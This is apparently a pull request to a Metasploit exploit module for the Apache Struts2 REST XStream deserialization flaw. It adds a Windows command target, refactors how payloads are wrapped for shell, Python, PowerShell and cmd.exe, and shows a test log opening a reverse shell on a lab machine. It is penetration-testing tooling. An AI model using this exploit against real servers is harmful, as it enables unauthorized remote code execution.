### PR TITLE
Add Windows ARCH_CMD target to struts2_rest_xstream

### DIFF
--- a/modules/exploits/multi/http/struts2_rest_xstream.rb
+++ b/modules/exploits/multi/http/struts2_rest_xstream.rb
@@ -83,9 +83,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     case target['Type']
-    when :unix_memory, :win_memory, :py_memory, :psh_memory
+    when /memory/
       execute_command(payload.encoded)
-    when :linux_dropper, :win_dropper
+    when /dropper/
       execute_cmdstager
     end
   end

--- a/modules/exploits/multi/http/struts2_rest_xstream.rb
+++ b/modules/exploits/multi/http/struts2_rest_xstream.rb
@@ -37,23 +37,33 @@ class MetasploitModule < Msf::Exploit::Remote
       'Targets'        => [
         ['Unix (In-Memory)',
           'Platform'   => 'unix',
-          'Arch'       => ARCH_CMD
+          'Arch'       => ARCH_CMD,
+          'Type'       => :unix_memory
+        ],
+        ['Windows (In-Memory)',
+          'Platform'   => 'win',
+          'Arch'       => ARCH_CMD,
+          'Type'       => :win_memory
         ],
         ['Python (In-Memory)',
           'Platform'   => 'python',
-          'Arch'       => ARCH_PYTHON
+          'Arch'       => ARCH_PYTHON,
+          'Type'       => :py_memory
         ],
         ['PowerShell (In-Memory)',
           'Platform'   => 'win',
-          'Arch'       => [ARCH_X86, ARCH_X64]
+          'Arch'       => [ARCH_X86, ARCH_X64],
+          'Type'       => :psh_memory
         ],
         ['Linux (Dropper)',
           'Platform'   => 'linux',
-          'Arch'       => [ARCH_X86, ARCH_X64]
+          'Arch'       => [ARCH_X86, ARCH_X64],
+          'Type'       => :linux_dropper
         ],
         ['Windows (Dropper)',
           'Platform'   => 'win',
-          'Arch'       => [ARCH_X86, ARCH_X64]
+          'Arch'       => [ARCH_X86, ARCH_X64],
+          'Type'       => :win_dropper
         ]
       ],
       'DefaultTarget'  => 0
@@ -66,42 +76,34 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    if execute_command(random_crap)
-      CheckCode::Appears
-    else
-      CheckCode::Safe
-    end
+    return CheckCode::Appears if execute_command(random_crap)
+
+    CheckCode::Safe
   end
 
   def exploit
-    case target.name
-    when /Unix/, /Python/, /PowerShell/
+    case target['Type']
+    when :unix_memory, :win_memory, :py_memory, :psh_memory
       execute_command(payload.encoded)
-    else
+    when :linux_dropper, :win_dropper
       execute_cmdstager
     end
   end
 
-  #
-  # Exploit methods
-  #
-
   def execute_command(cmd, opts = {})
-    cmd = case target.name
-    when /Unix/, /Linux/
-      %W{/bin/sh -c #{cmd}}
-    when /Python/
-      %W{python -c #{cmd}}
-    when /PowerShell/
-      payload ? cmd_psh_payload(
-        cmd,
-        payload.arch,
-        remove_comspec:       true,
-        encode_final_payload: true
-      ).split : %W{powershell.exe -c #{cmd}}
-    when /Windows/
-      %W{cmd.exe /c #{cmd}}
-    end
+    cmd =
+      case target['Type']
+      when :unix_memory, :linux_dropper
+        %W{/bin/sh -c #{cmd}}
+      when :py_memory
+        %W{python -c #{cmd}}
+      when :psh_memory
+        opts = {remove_comspec: true, encode_final_payload: true}
+        payload ? cmd_psh_payload(cmd, payload.arch, opts).split :
+        %W{powershell.exe -c #{cmd}}
+      when :win_memory, :win_dropper
+        %W{cmd.exe /c #{cmd}}
+      end
 
     # Encode each command argument with XML entities
     cmd.map! { |arg| arg.encode(xml: :text) }
@@ -179,10 +181,6 @@ class MetasploitModule < Msf::Exploit::Remote
 EOF
   end
 
-  #
-  # Utility methods
-  #
-
   def check_response(res)
     res && res.code == 500 && res.body.include?(error_string)
   end
@@ -192,7 +190,7 @@ EOF
   end
 
   def random_crap
-    Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+    Rex::Text.rand_text_alphanumeric(8..42)
   end
 
 end


### PR DESCRIPTION
All targets have been tested successfully. This is just a follow-up.

- [x] Test `Unix (In-Memory)` target
- [x] Test `Windows (In-Memory)` target
- [x] Test `Python (In-Memory)` target
- [x] Test `PowerShell (In-Memory)` target
- [x] Test `Linux (Dropper)` target
- [x] Test `Windows (Dropper)` target

```
msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49685) at 2018-08-28 17:01:29 -0500

Microsoft Windows [Version 10.0.17134.1]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\IEUser\Downloads\apache-tomcat-9.0.11-windows-x64\apache-tomcat-9.0.11\bin>
```

#8924, #10538